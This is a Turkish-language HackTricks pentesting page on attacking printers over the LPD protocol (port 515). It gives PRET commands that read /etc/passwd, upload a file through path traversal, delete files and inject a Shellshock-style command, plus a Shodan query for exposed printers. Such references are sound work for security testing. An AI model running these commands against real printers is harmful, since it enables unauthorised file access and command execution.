tip
AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks'i Destekleyin
- abonelik planlarını kontrol edin!
- Bize katılın 💬 Discord grubuna veya telegram grubuna veya bizi takip edin Twitter'da 🐦 @hacktricks_live.
- Hacking ipuçlarını paylaşın, HackTricks ve HackTricks Cloud github reposuna PR göndererek.
LPD Protokolüne Giriş
1980'lerde, Line Printer Daemon (LPD) protokolü Berkeley Unix'te geliştirilmiş ve daha sonra RFC1179 ile resmileştirilmiştir. Bu protokol, lpr
komutu aracılığıyla etkileşimlere olanak tanıyan 515/tcp portu üzerinden çalışır. LPD aracılığıyla yazdırmanın özü, iş detaylarını ve kullanıcıyı belirtmek için bir kontrol dosyası ile yazdırma bilgilerini içeren bir veri dosyası göndermeyi içerir. Kontrol dosyası, veri dosyası için çeşitli dosya formatlarının seçilmesine olanak tanırken, bu dosyaların işlenmesi belirli LPD uygulaması tarafından belirlenir. Unix benzeri sistemler için yaygın olarak bilinen bir uygulama LPRng'dir. Dikkate değer bir şekilde, LPD protokolü kötü niyetli PostScript veya PJL yazdırma işleri yürütmek için istismar edilebilir.
LPD Yazıcıları ile Etkileşim Araçları
PRET, LPD uyumlu yazıcılarla etkileşim kurmak için lpdprint
ve lpdtest
adlı iki temel aracı tanıtır ve bu araçlar, yazıcıda veri yazdırmaktan dosyaları indirme, yükleme veya silme gibi bir dizi eylemi gerçekleştirmek için basit bir yöntem sunar:
# To print a file to an LPD printer
lpdprint.py hostname filename
# To get a file from the printer
lpdtest.py hostname get /etc/passwd
# To upload a file to the printer
lpdtest.py hostname put ../../etc/passwd
# To remove a file from the printer
lpdtest.py hostname rm /some/file/on/printer
# To execute a command injection on the printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
# To send a mail through the printer
lpdtest.py hostname mail lpdtest@mailhost.local
Yazıcı hackleme alanını daha fazla keşfetmekle ilgilenen bireyler için kapsamlı bir kaynak burada bulunabilir: Hacking Printers.
Shodan
port 515
tip
AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks'i Destekleyin
- abonelik planlarını kontrol edin!
- Bize katılın 💬 Discord grubuna veya telegram grubuna veya bizi takip edin Twitter'da 🐦 @hacktricks_live.
- Hacking ipuçlarını paylaşın, HackTricks ve HackTricks Cloud github reposuna PR göndererek.